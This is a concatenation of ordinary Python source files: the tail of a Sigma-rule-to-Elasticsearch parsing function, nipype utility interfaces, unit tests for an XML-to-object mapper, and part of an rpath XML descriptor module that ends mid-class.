{0!s}'.format(exception)) raise except yaml.parser.ParserError as exception: logger.error('Yaml parsing error rule {0!s}'.format(exception)) raise sigma_es_query = '' for sigma_rule in parsed_sigma_rules: sigma_es_query = _sanitize_query(sigma_rule) rule_return.update({'es_query': sigma_es_query}) rule_return.update({'file_name': 'N/A'}) rule_return.update({'file_relpath': 'N/A'}) return rule_return
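# --------------------------------------------------------------------------
# Usage sketch (illustrative only, not the Timesketch implementation): a
# self-contained helper mirroring two of the replacements that
# _sanitize_query above applies to the backend's query string.  The helper
# name and the sample query are invented for this example.
def _sanitize_demo(query):
    """Mirror two of the replacements performed by _sanitize_query."""
    query = query.replace('.keyword:', ':')  # drop the .keyword field suffix
    query = query.replace('\\ ', ' ')        # unescape backslash-escaped spaces
    return query

print(_sanitize_demo('data_type.keyword:windows\\ eventlog'))
# -> data_type:windows eventlog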
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: import os import re import numpy as np import nibabel as nb from nipype.utils.filemanip import (filename_to_list, copyfile, split_filename) from nipype.interfaces.base import (traits, TraitedSpec, DynamicTraitedSpec, File, Undefined, isdefined, OutputMultiPath, InputMultiPath, BaseInterface, BaseInterfaceInputSpec) from nipype.interfaces.io import IOBase, add_traits from nipype.testing import assert_equal from nipype.utils.misc import getsource, create_function_from_source, dumps class IdentityInterface(IOBase): """Basic interface class generates identity mappings Examples -------- >>> from nipype.interfaces.utility import IdentityInterface >>> ii = IdentityInterface(fields=['a', 'b'], mandatory_inputs=False) >>> ii.inputs.a <undefined> >>> ii.inputs.a = 'foo' >>> out = ii._outputs() >>> out.a <undefined> >>> out = ii.run() >>> out.outputs.a 'foo' >>> ii2 = IdentityInterface(fields=['a', 'b'], mandatory_inputs=True) >>> ii2.inputs.a = 'foo' >>> out = ii2.run() # doctest: +SKIP ValueError: IdentityInterface requires a value for input 'b' because it was listed in 'fields' Interface IdentityInterface failed to run. """ input_spec = DynamicTraitedSpec output_spec = DynamicTraitedSpec def __init__(self, fields=None, mandatory_inputs=True, **inputs): super(IdentityInterface, self).__init__(**inputs) if fields is None or not fields: raise Exception('Identity Interface fields must be a non-empty list') self._fields = fields self._mandatory_inputs = mandatory_inputs add_traits(self.inputs, fields) def _add_output_traits(self, base): undefined_traits = {} for key in self._fields: base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _list_outputs(self): #manual mandatory inputs check if self._fields and self._mandatory_inputs: for key in self._fields: value = getattr(self.inputs, key) if not isdefined(value): msg = "%s requires a value for input '%s' because it was listed in 'fields'. \ You can turn off mandatory inputs checking by passing mandatory_inputs = False to the constructor." 
% \ (self.__class__.__name__, key) raise ValueError(msg) outputs = self._outputs().get() for key in self._fields: val = getattr(self.inputs, key) if isdefined(val): outputs[key] = val return outputs class MergeInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec): axis = traits.Enum('vstack', 'hstack', usedefault=True, desc='direction in which to merge, hstack requires same number of elements in each input') class MergeOutputSpec(TraitedSpec): out = traits.List(desc='Merged output') class Merge(IOBase): """Basic interface class to merge inputs into a single list Examples -------- >>> from nipype.interfaces.utility import Merge >>> mi = Merge(3) >>> mi.inputs.in1 = 1 >>> mi.inputs.in2 = [2, 5] >>> mi.inputs.in3 = 3 >>> out = mi.run() >>> out.outputs.out [1, 2, 5, 3] """ input_spec = MergeInputSpec output_spec = MergeOutputSpec def __init__(self, numinputs=0, **inputs): super(Merge, self).__init__(**inputs) self.numinputs = numinputs add_traits(self.inputs, ['in%d' % (i + 1) for i in range(numinputs)]) def _list_outputs(self): outputs = self._outputs().get() out = [] if self.inputs.axis == 'vstack': for idx in range(self.numinputs): value = getattr(self.inputs, 'in%d' % (idx + 1)) if isdefined(value): if isinstance(value, list): out.extend(value) else: out.append(value) else: for i in range(len(filename_to_list(self.inputs.in1))): out.insert(i, []) for j in range(self.numinputs): out[i].append(filename_to_list(getattr(self.inputs, 'in%d' % (j + 1)))[i]) if out: outputs['out'] = out return outputs class RenameInputSpec(DynamicTraitedSpec): in_file = File(exists=True, mandatory=True, desc="file to rename") keep_ext = traits.Bool(desc="Keep in_file extension, replace non-extension component of name") format_string = traits.String(mandatory=True, desc="Python formatting string for output template") parse_string = traits.String(desc="Python regexp parse string to define replacement inputs") class RenameOutputSpec(TraitedSpec): out_file = traits.File(exists=True, desc="softlink to original file with new name") class Rename(IOBase): """Change the name of a file based on a mapped format string. To use additional inputs that will be defined at run-time, the class constructor must be called with the format template, and the fields identified will become inputs to the interface. Additionally, you may set the parse_string input, which will be run over the input filename with a regular expressions search, and will fill in additional input fields from matched groups. Fields set with inputs have precedence over fields filled in with the regexp match. 
Examples -------- >>> from nipype.interfaces.utility import Rename >>> rename1 = Rename() >>> rename1.inputs.in_file = "zstat1.nii.gz" >>> rename1.inputs.format_string = "Faces-Scenes.nii.gz" >>> res = rename1.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'Faces-Scenes.nii.gz" # doctest: +SKIP >>> rename2 = Rename(format_string="%(subject_id)s_func_run%(run)02d") >>> rename2.inputs.in_file = "functional.nii" >>> rename2.inputs.keep_ext = True >>> rename2.inputs.subject_id = "subj_201" >>> rename2.inputs.run = 2 >>> res = rename2.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'subj_201_func_run02.nii' # doctest: +SKIP >>> rename3 = Rename(format_string="%(subject_id)s_%(seq)s_run%(run)02d.nii") >>> rename3.inputs.in_file = "func_epi_1_1.nii" >>> rename3.inputs.parse_string = "func_(?P<seq>\w*)_.*" >>> rename3.inputs.subject_id = "subj_201" >>> rename3.inputs.run = 2 >>> res = rename3.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'subj_201_epi_run02.nii' # doctest: +SKIP """ input_spec = RenameInputSpec output_spec = RenameOutputSpec def __init__(self, format_string=None, **inputs): super(Rename, self).__init__(**inputs) if format_string is not None: self.inputs.format_string = format_string self.fmt_fields = re.findall(r"%\((.+?)\)", format_string) add_traits(self.inputs, self.fmt_fields) else: self.fmt_fields = [] def _rename(self): fmt_dict = dict() if isdefined(self.inputs.parse_string): m = re.search(self.inputs.parse_string, os.path.split(self.inputs.in_file)[1]) if m: fmt_dict.update(m.groupdict()) for field in self.fmt_fields: val = getattr(self.inputs, field) if isdefined(val): fmt_dict[field] = getattr(self.inputs, field) if self.inputs.keep_ext: fmt_string = "".join([self.inputs.format_string, split_filename(self.inputs.in_file)[2]]) else: fmt_string = self.inputs.format_string return fmt_string % fmt_dict def _run_interface(self, runtime): runtime.returncode = 0 _ = copyfile(self.inputs.in_file, os.path.join(os.getcwd(), self._rename())) return runtime def _list_outputs(self): outputs = self._outputs().get() outputs["out_file"] = os.path.join(os.getcwd(), self._rename()) return outputs class SplitInputSpec(BaseInterfaceInputSpec): inlist = traits.List(traits.Any, mandatory=True, desc='list of values to split') splits = traits.List(traits.Int, mandatory=True, desc='Number of outputs in each split - should add to number of inputs') class Split(IOBase): """Basic interface class to split lists into multiple outputs Examples -------- >>> from nipype.interfaces.utility import Split >>> sp = Split() >>> _ = sp.inputs.set(inlist=[1, 2, 3], splits=[2, 1]) >>> out = sp.run() >>> out.outputs.out1 [1, 2] """ input_spec = SplitInputSpec output_spec = DynamicTraitedSpec def _add_output_traits(self, base): undefined_traits = {} for i in range(len(self.inputs.splits)): key = 'out%d' % (i + 1) base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _list_outputs(self): outputs = self._outputs().get() if isdefined(self.inputs.splits): if sum(self.inputs.splits) != len(self.inputs.inlist): raise RuntimeError('sum of splits != num of list elements') splits = [0] splits.extend(self.inputs.splits) splits = np.cumsum(splits) for i in range(len(splits) - 1): outputs['out%d' % (i + 1)] = np.array(self.inputs.inlist)[splits[i]:splits[i + 1]].tolist() return outputs class SelectInputSpec(BaseInterfaceInputSpec): inlist = InputMultiPath(traits.Any, 
mandatory=True, desc='list of values to choose from') index = InputMultiPath(traits.Int, mandatory=True, desc='0-based indices of values to choose') class SelectOutputSpec(TraitedSpec): out = OutputMultiPath(traits.Any, desc='list of selected values') class Select(IOBase): """Basic interface class to select specific elements from a list Examples -------- >>> from nipype.interfaces.utility import Select >>> sl = Select() >>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3]) >>> out = sl.run() >>> out.outputs.out 4 >>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3, 4]) >>> out = sl.run() >>> out.outputs.out [4, 5] """ input_spec = SelectInputSpec output_spec = SelectOutputSpec def _list_outputs(self): outputs = self._outputs().get() out = np.array(self.inputs.inlist)[np.array(self.inputs.index)].tolist() outputs['out'] = out return outputs class FunctionInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec): function_str = traits.Str(mandatory=True, desc='code for function') class Function(IOBase): """Runs arbitrary function as an interface Examples -------- >>> func = 'def func(arg1, arg2=5): return arg1 + arg2' >>> fi = Function(input_names=['arg1', 'arg2'], output_names=['out']) >>> fi.inputs.function_str = func >>> res = fi.run(arg1=1) >>> res.outputs.out 6 """ input_spec = FunctionInputSpec output_spec = DynamicTraitedSpec def __init__(self, input_names, output_names, function=None, **inputs): """ Parameters ---------- input_names: single str or list names corresponding to function inputs output_names: single str or list names corresponding to function outputs. has to match the number of outputs """ super(Function, self).__init__(**inputs) if function: if hasattr(function, '__call__'): try: self.inputs.function_str = getsource(function) except IOError: raise Exception('Interface Function does not accept ' \ 'function objects defined interactively in a python session') elif isinstance(function, str): self.inputs.function_str = function else: raise Exception('Unknown type of function') self.inputs.on_trait_change(self._set_function_string, 'function_str') self._input_names = filename_to_list(input_names) self._output_names = filename_to_list(output_names) add_traits(self.inputs, [name for name in self._input_names]) self._out = {} for name in self._output_names: self._out[name] = None def _set_function_string(self, obj, name, old, new): if name == 'function_str': if hasattr(new, '__call__'): function_source = getsource(new) elif isinstance(new, str): function_source = dumps(new) self.inputs.trait_set(trait_change_notify=False, **{'%s' % name: function_source}) def _add_output_traits(self, base): undefined_traits = {} for key in self._output_names: base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _run_interface(self, runtime): function_handle = create_function_from_source(self.inputs.function_str) args = {} for name in self._input_names: value = getattr(self.inputs, name) if isdefined(value): args[name] = value out = function_handle(**args) if len(self._output_names) == 1: self._out[self._output_names[0]] = out else: if isinstance(out, tuple) and (len(out) != len(self._output_names)): raise RuntimeError('Mismatch in number of expected outputs') else: for idx, name in enumerate(self._output_names): self._out[name] = out[idx] return runtime def _list_outputs(self): outputs = self._outputs().get() for key in self._output_names: outputs[key] = self._out[key] return outputs class 
AssertEqualInputSpec(BaseInterfaceInputSpec): volume1 = File(exists=True, mandatory=True) volume2 = File(exists=True, mandatory=True) class AssertEqual(BaseInterface): input_spec = AssertEqualInputSpec def _run_interface(self, runtime): data1 = nb.load(self.inputs.volume1).get_data() data2 = nb.load(self.inputs.volume2).get_data() assert_equal(data1, data2) return runtime
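# --------------------------------------------------------------------------
# A short usage sketch for the Function interface defined above, mirroring
# its docstring: wrap a plain Python function and run it outside a workflow.
# It assumes nipype is importable; ``add_two`` and the input value are made
# up for the illustration.
from nipype.interfaces.utility import Function


def add_two(val):
    # Keep the body self-contained: nipype re-creates the function from its
    # source string, so it cannot rely on the enclosing scope.
    return val + 2


adder = Function(input_names=['val'], output_names=['out'], function=add_two)
adder.inputs.val = 40
res = adder.run()
print(res.outputs.out)  # -> 42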
import six if six.PY2: import mock else: from unittest import mock import unittest from lxml import etree import should_be.all # noqa import xmlmapper as mp from xmlmapper import xml_helpers as xh class SampleModel(mp.Model): ROOT_ELEM = 'some_elem' name = mp.NodeValue('name') class TestModel(unittest.TestCase): def test_load_from_etree(self): xml = etree.Element('some_elem') name_elem = etree.Element('name') name_elem.text = 'hi' xml.append(name_elem) model = SampleModel(xml) model._etree.shouldnt_be_none() model.name.should_be('hi') def test_load_from_string(self): xml = "<some_elem><name>hi</name></some_elem>" model = SampleModel(xml) model._etree.shouldnt_be_none() model.name.should_be('hi') def test_load_from_none(self): model = SampleModel() model._etree.shouldnt_be_none() model._etree.tag.should_be('some_elem') def test_raises_when_root_elem_doesnt_match(self): xml = "<some_other_elem><name>hi</name></some_other_elem>" def make_sample_model(xml): return SampleModel(xml) make_sample_model.should_raise(ValueError, xml) def test_to_string(self): model = SampleModel() model.name = 'some name' xml_str = str(model) if six.PY2: xml_str2 = model.to_xml() xml_str3 = unicode(model) xml_str3.should_be(xml_str2.decode('ascii')) else: xml_str2 = model.to_xml(encoding=str) xml_str.should_be(xml_str2) xml = etree.fromstring(xml_str) name_elem = xml.find('name') name_elem.shouldnt_be_none() name_elem.text.should_be('some name') def test_to_bytes(self): model = SampleModel() model.name = 'some name' xml_str = bytes(model) xml_str2 = model.to_xml() xml_str.should_be(xml_str2) xml = etree.fromstring(xml_str) name_elem = xml.find('name') name_elem.shouldnt_be_none() name_elem.text.should_be('some name') class TestElemUtils(unittest.TestCase): def test_make_elem_plain(self): elem = mp.make_elem('some_elem') elem.tag.should_be('some_elem') def test_make_elem_with_attr_name(self): elem = mp.make_elem('some_elem[@some_attr]') elem.tag.should_be('some_elem') elem.get('some_attr').should_be_empty() def test_make_elem_with_attr_full(self): elem = mp.make_elem('some_elem[@some_attr="some val"]') elem.tag.should_be('some_elem') elem.get('some_attr').should_be('some val') def test_make_elem_multiple_attrs(self): elem = mp.make_elem('some_elem[@some_attr="some val"][@other_attr]') elem.tag.should_be('some_elem') elem.get('some_attr').should_be('some val') elem.get('other_attr').should_be_empty() def test_make_path_already_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') t2 = etree.Element('tag2') t3 = etree.Element('tag3') root.append(t1) t1.append(t2) t2.append(t3) with mock.patch.object(mp, 'make_elem') as make_patch: res = mp.make_path('tag1/tag2/tag3', root) make_patch.called.should_be_false() res.tag.should_be('tag3') def test_make_path_parent_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') t2 = etree.Element('tag2') root.append(t1) t1.append(t2) res = mp.make_path('tag1/tag2/tag3', root) res.tag.should_be('tag3') t2.find('tag3').shouldnt_be_none() def test_make_path_nothing_exists(self): root = etree.Element('root') res = mp.make_path('tag1/tag2/tag3', root) res.shouldnt_be_none() res.tag.should_be('tag3') root.find('tag1/tag2/tag3').shouldnt_be_none() def test_make_path_with_attribs(self): root = etree.Element('root') res = mp.make_path('tag1/tag2/tag3[@name="val"]', root) res.shouldnt_be_none() res.tag.should_be('tag3') res.get('name').should_be('val') root.find('tag1/tag2/tag3').shouldnt_be_none() def test_make_path_to_parent_some_exists(self): root = 
etree.Element('root') t1 = etree.Element('tag1') root.append(t1) res = mp.make_path('tag1/tag2/tag3', root, to_parent=True) res.tag.should_be('tag2') t1.find('tag2').shouldnt_be_none() def test_make_path_to_parent_all_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') t2 = etree.Element('tag2') root.append(t1) t1.append(t2) res = mp.make_path('tag1/tag2/tag3', root, to_parent=True) res.tag.should_be('tag2') t1.find('tag2').shouldnt_be_none() class _TestDescBase(object): def make_present(self): self.model._etree.append(self.elem) def test_get_exists(self): self.make_present() self.desc.__get__(self.model).should_be(self.target_value) def test_get_not_exists(self): self.desc.__get__(self.model).should_be_none() def test_del_exists(self): self.make_present() self.desc.__delete__(self.model) def test_del_not_exists(self): self.desc.__delete__.should_raise(AttributeError, self.model) def test_set_exists(self): self.make_present() self.desc.__get__(self.model).should_be(self.target_value) self.desc.__set__(self.model, self.alternate_value) self.desc.__get__(self.model).should_be(self.alternate_value) def test_set_not_exists(self): self.desc.__set__(self.model, self.alternate_value) self.desc.__get__(self.model).should_be(self.alternate_value) class TestCustomNodeValue(_TestDescBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.elem = etree.Element('name', lang='english') self.target_value = 'some name' self.alternate_value = 'some other name' self.elem.text = self.target_value self.desc = mp.CustomNodeValue('name[@lang="english"]', xh.load_text, xh.dump_text) def test_loads(self): self.model._etree.append(self.elem) self.desc._loads = lambda e: str(e.text) + '-hi' self.desc.__get__(self.model).should_be(self.target_value + '-hi') def test_dumps(self): def set_text(v, e): e.text = v[:-3] return e self.desc._dumps = set_text self.desc.__set__(self.model, self.target_value + '-hi') elem = self.model._etree.find('name') elem.shouldnt_be_none() elem.text.should_be(self.target_value) def test_set_invalidates_cache(self): self.model._cache = True self.desc._cached_vals[self.model] = 'cheese' self.desc.__set__(self.model, 'crackers') self.desc.__get__(self.model).should_be('crackers') self.desc._cached_vals[self.model].should_be('crackers') def test_get_cache_disabled(self): self.model._cache = False self.desc.__set__(self.model, 'cheese') self.desc.__get__(self.model).should_be('cheese') self.model._etree.find('name').text = 'crackers' self.desc.__get__(self.model).should_be('crackers') def test_get_cache_enabled(self): self.model._cache = True self.desc._cached_vals[self.model] = 'cheese' self.desc.__get__(self.model).should_be('cheese') class TestNodeValue(TestCustomNodeValue): def setUp(self): self.model = SampleModel() self.elem = etree.Element('name') self.target_value = 'some value' self.alternate_value = 'some other value' self.elem.text = self.target_value self.desc = mp.NodeValue('name') def test_loads(self): self.model._etree.append(self.elem) self.desc._raw_loads = lambda v: str(v) + '-hi' self.desc.__get__(self.model).should_be(self.target_value + '-hi') def test_dumps(self): self.desc._dumps = lambda v: v[:-3] self.desc.__set__(self.model, self.target_value + '-hi') elem = self.model._etree.find('name') elem.shouldnt_be_none() elem.text.should_be(self.target_value) class TestAttributeValue(_TestDescBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.elem = etree.Element('cheese') self.target_value = 'cheddar' 
self.alternate_value = 'swiss' self.elem.set('type', 'cheddar') self.desc = mp.AttributeValue('cheese', 'type') class TestNodeModelValue(_TestDescBase, unittest.TestCase): def setUp(self): class OtherModel(mp.Model): ROOT_ELEM = 'food' crackers = mp.NodeValue('crackers') self.model = SampleModel() self.target_value = OtherModel() self.target_value.crackers = 'ritz' self.alternate_value = OtherModel() self.alternate_value.crackers = 'whole-grain' self.desc = mp.ModelNodeValue('food', OtherModel, always_present=False) self.elem = self.target_value._etree def test_always_present(self): self.desc._always_present = True self.desc.__get__(self.model).shouldnt_be_none() class _TestNodeValueListViewBase(_TestDescBase): @property def init_desc(self): return self.desc.__get__(self.model) def make_item_present(self, content='', ind=1): item_elem = etree.Element(self.item_elem_name, name=content) self.elem.insert(ind, item_elem) def test_get_item_exists(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.init_desc[0].shouldnt_be_none() self.init_desc[0].should_be(self.alternate_value[0]) def test_get_item_not_exists(self): self.make_present() self.init_desc.__getitem__.should_raise(IndexError, 0) def test_set_item_exists(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.init_desc[0] = self.alternate_value[2] self.model._etree.findall(self.item_path).should_have_length(1) self.model._etree.find(self.item_path).get('name').should_be( self.alternate_value[2]) def test_set_item_not_exists(self): self.make_present() self.init_desc[0] = self.alternate_value[2] self.model._etree.findall(self.item_path).should_have_length(1) self.model._etree.find(self.item_path).get('name').should_be( self.alternate_value[2]) def test_del_item_exists(self): self.make_present() self.make_item_present(self.alternate_value[0]) del self.init_desc[0] self.model._etree.find(self.item_path).should_be_none() def test_del_item_not_exists(self): self.make_present() self.init_desc.pop.should_raise(IndexError, 0) self.model._etree.find(self.item_path).should_be_none() def test_always_present(self): self.desc._always_present = True self.init_desc.should_be([]) def test_len(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) len(self.desc.__get__(self.model)).should_be(2) class TestNodeValueListView(_TestNodeValueListViewBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.target_value = [] self.alternate_value = ['ritz', 'triscuit', 'wheat thins'] self.desc = mp.NodeValueListView('food', 'cracker', lambda e: e.get('name'), lambda v, e: e.set('name', v)) self.elem = etree.Element('food') self.item_elem_name = 'cracker' self.item_path = 'food/cracker' self.elem.append(etree.Element('cheese', name='cheddar')) self.elem.append(etree.Element('cheese', name='swiss')) def test_partial_set(self): self.make_present() self.make_item_present(self.alternate_value[1]) dumper = lambda v, e: e.set('like', v) other_desc = mp.NodeValueListView('food', 'cracker', lambda e: e.text, full_replace=False, elem_dumps=dumper) other_init_desc = other_desc.__get__(self.model) other_init_desc[0] = 'shredded wheat' self.model._etree.findall(self.item_path).should_have_length(1) elem = self.model._etree.find(self.item_path) elem.get('like').should_be('shredded wheat') elem.get('name').should_be(self.alternate_value[1]) def test_set_leaves_other_elems_behind(self): self.make_present() 
self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) food_elem = self.model._etree.find('food') len(food_elem).should_be(4) self.desc.__set__(self.model, ['wheat thins']) len(food_elem).should_be(3) food_elem[0].tag.should_be('cheese') food_elem[1].tag.should_be('cheese') food_elem[2].tag.should_be('cracker') food_elem[2].get('name').should_be('wheat thins') def test_delete_leaves_other_elems_behind(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) food_elem = self.model._etree.find('food') len(food_elem).should_be(4) self.desc.__delete__(self.model) len(food_elem).should_be(2) food_elem[0].tag.should_be('cheese') food_elem[1].tag.should_be('cheese') def test_set_item_exists(self): super(TestNodeValueListView, self).test_set_item_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_set_item_not_exists(self): super(TestNodeValueListView, self).test_set_item_not_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_del_item_exists(self): super(TestNodeValueListView, self).test_del_item_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_del_item_not_exists(self): super(TestNodeValueListView, self).test_del_item_not_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_insert(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1], ind=3) self.init_desc.insert(1, self.alternate_value[2]) self.model._etree.findall(self.item_path).should_have_length(3) list(self.init_desc).should_be([self.alternate_value[0], self.alternate_value[2], self.alternate_value[1]]) elem = self.model._etree.find('food')[3] elem.tag.should_be('cracker') elem.get('name').should_be(self.alternate_value[2]) def test_delete_pred_true_removes_elem(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) self.desc._delete_pred = lambda e: True del self.init_desc[0] len(self.model._etree.findall(self.item_path)).should_be(1) def test_delete_pred_false_keeps_elem(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) def del_pred(elem): elem.attrib.pop('name') return False self.desc._delete_pred = del_pred del self.init_desc[0] len(self.model._etree.findall(self.item_path)).should_be(2) self.model._etree.find(self.item_path).get('name', None).should_be_none() class TestNodeValueList(_TestNodeValueListViewBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.target_value = [] self.alternate_value = ['american', 'pepperjack', 'cheddar'] self.desc = mp.NodeValueList('food', lambda e: e.get('name'), lambda v: etree.Element('cheese', name=v)) self.elem = etree.Element('food') self.item_elem_name = 'cheese' self.item_path = 'food/cheese' def make_present(self): super(TestNodeValueList, self).make_present() def test_delete_removes_node(self): self.make_present() self.model._etree.find('food').shouldnt_be_none() self.desc.__delete__(self.model) self.model._etree.find('food').should_be_none() def test_insert(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1], ind=3) self.init_desc.insert(1, self.alternate_value[2]) self.model._etree.findall(self.item_path).should_have_length(3) list(self.init_desc).should_be([self.alternate_value[0], 
self.alternate_value[2], self.alternate_value[1]])
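# --------------------------------------------------------------------------
# A minimal usage sketch of the mapper exercised by the tests above
# (assuming ``xmlmapper`` is importable).  The ``Snack`` model, its root
# element, and the XML snippet are invented for illustration; the pattern
# follows SampleModel, test_load_from_string and test_to_string.
import xmlmapper as mp


class Snack(mp.Model):
    ROOT_ELEM = 'snack'
    name = mp.NodeValue('name')  # maps the text of <name> to an attribute


snack = Snack('<snack><name>crackers</name></snack>')
print(snack.name)   # -> 'crackers'
snack.name = 'cheese'
print(str(snack))   # serialized XML with the updated <name> element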
#!/usr/bin/python # # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import re from rpath_xmllib import api1 as xmllib from catalogService import descriptor_errors as errors class _NodeDescriptorMixin(object): """ @cvar _nodeDescription: a mapping between node classes and attribute names. If the attribute name is the same as the class' name class variable, it can be passed in as C{None}. @type _nodeDescription: C{list} of (nodeClass, attributeName) tuples """ _nodeDescription = [] @classmethod def _setMapping(cls): if hasattr(cls, '_mapping'): return mapping = cls._mapping = {} for nodeClass, attrName in cls._nodeDescription: # If no attribute name is set, use the class' name if attrName is None: attrName = nodeClass.name mapping[nodeClass] = attrName def __init__(self): self.__class__._setMapping() if not hasattr(self, 'extend'): for nodeClass, attrName in self._mapping.items(): setattr(self, attrName, None) def addChild(self, child): if child.__class__ not in self._mapping: return attrName = self._mapping[child.__class__] if getattr(child.__class__, 'multiple', None): vlist = getattr(self, attrName) if vlist is None: vlist = [] setattr(self, attrName, vlist) vlist.append(child.finalize()) elif hasattr(self, 'extend'): self.extend([child.finalize()]) else: setattr(self, attrName, child.finalize()) def _encodeChild(self, nodeClass, attrName, val): if issubclass(nodeClass, xmllib.IntegerNode): return xmllib.IntegerNode(name = attrName).characters(str(val)) if issubclass(nodeClass, xmllib.StringNode): if not isinstance(val, basestring): val = str(val) return xmllib.StringNode(name = attrName).characters(val) if issubclass(nodeClass, xmllib.BooleanNode): return xmllib.BooleanNode(name = attrName).characters( xmllib.BooleanNode.toString(val)) if issubclass(nodeClass, xmllib.NullNode): return xmllib.NullNode(name = attrName) if hasattr(val, 'getElementTree'): return val return None def _iterChildren(self): if hasattr(self, 'extend'): for y in self.iterChildren(): yield y else: for nodeClass, attrName in self._nodeDescription: if attrName is None: attrName = nodeClass.name val = getattr(self, attrName) if val is None and not issubclass(nodeClass, xmllib.NullNode): # The value was not set continue if getattr(nodeClass, 'multiple', None): if not hasattr(val, 'extend'): val = [ val ] else: val = [ val ] for v in val: node = self._encodeChild(nodeClass, attrName, v) if node is not None: yield node def _getName(self): return self.__class__.name class _ExtendEnabledMixin(object): def extend(self, iterable): self._children.extend(iterable) def __iter__(self): return self.iterChildren() def _getName(self): return self.name def _iterChildren(self): for val in self.iterChildren(): if not isinstance(val, (int, str, unicode, bool)): yield val continue # We need to determine the class type - it should be the same nodeClass, attrName = self._nodeDescription[0] if attrName is None: attrName = nodeClass.name if isinstance(val, int): val = xmllib.IntegerNode(name = attrName).characters( 
str(val)) elif isinstance(val, (str, unicode)): val = xmllib.StringNode(name = attrName).characters(val) elif isinstance(val, bool): val = xmllib.BooleanNode(name = attrName).characters( xmllib.BooleanNode.toString(val)) yield val class _NoCharDataNode(_NodeDescriptorMixin, xmllib.BaseNode): def __init__(self, attributes = None, nsMap = None, name = None): xmllib.BaseNode.__init__(self, attributes = attributes, nsMap = nsMap, name = name) _NodeDescriptorMixin.__init__(self) def characters(self, ch): pass class _DisplayName(xmllib.StringNode): name = 'displayName' class DescriptionNode(xmllib.BaseNode): name = 'desc' @classmethod def fromData(cls, description, lang = None): if isinstance(description, tuple): description, lang = description elif hasattr(description, 'description'): description, lang = description.description, description.lang attrs = {} if lang is not None: attrs['lang'] = lang dn = cls(attrs, name = cls.name) dn.characters(description) return dn class _Descriptions(_ExtendEnabledMixin, _NoCharDataNode): name = 'descriptions' _nodeDescription = [(DescriptionNode, None)] def getDescriptions(self): return dict((x.getAttribute('lang'), x.getText()) for x in self) class HelpNode(xmllib.BaseNode): name = 'help' multiple = True @classmethod def fromData(cls, href, lang = None): if isinstance(href, tuple): href, lang = href elif hasattr(href, 'href'): href, lang = href.href, href.lang attrs = {'href' : href} if lang is not None: attrs['lang'] = lang dn = cls(attrs, name = cls.name) return dn def _getLang(self): return self.getAttribute('lang') lang = property(_getLang) def _getHref(self): return self.getAttribute('href') def _setHref(self, val): # XXX that's not very polite self._otherAttributes[(None, 'href')] = val href = property(_getHref, _setHref) class _RootElement(xmllib.StringNode): name = "rootElement" class MetadataNode(_NoCharDataNode): name = 'metadata' _nodeDescription = [ (_DisplayName, None), (_RootElement, None), (_Descriptions, None), ] class _NameNode(xmllib.StringNode): name = 'name' class _TypeNode(xmllib.StringNode): name = 'type' class _KeyNode(xmllib.StringNode): name = 'key' class _ValueWithDescriptionNode(_NoCharDataNode): name = 'describedValue' _nodeDescription = [ (_Descriptions, None), (_KeyNode, None), ] class _EnumeratedTypeNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'enumeratedType' _nodeDescription = [ (_ValueWithDescriptionNode, None), ] class _MultipleNode(xmllib.BooleanNode): name = 'multiple' class _DefaultNode(xmllib.StringNode): name = 'default' multiple = True class _MinNode(xmllib.IntegerNode): name = 'min' class _MaxNode(xmllib.IntegerNode): name = 'max' class _RequiredNode(xmllib.BooleanNode): name = 'required' class _AllowFileContent(xmllib.BooleanNode): name = 'allowFileContent' class _PasswordNode(xmllib.BooleanNode): name = 'password' class _HiddenNode(xmllib.BooleanNode): name = 'hidden' class _RangeNode(_NoCharDataNode): name = 'range' _nodeDescription = [ (_MinNode, None), (_MaxNode, None), ] def presentation(self): return dict(constraintName = self.__class__.name, min = self.min, max = self.max) @classmethod def fromData(cls, data): obj = cls(name = cls.name) obj.min = data.get('min') obj.max = data.get('max') return obj class _ItemNode(xmllib.StringNode): name = 'item' class _LegalValuesNode(_ExtendEnabledMixin, _NoCharDataNode): name 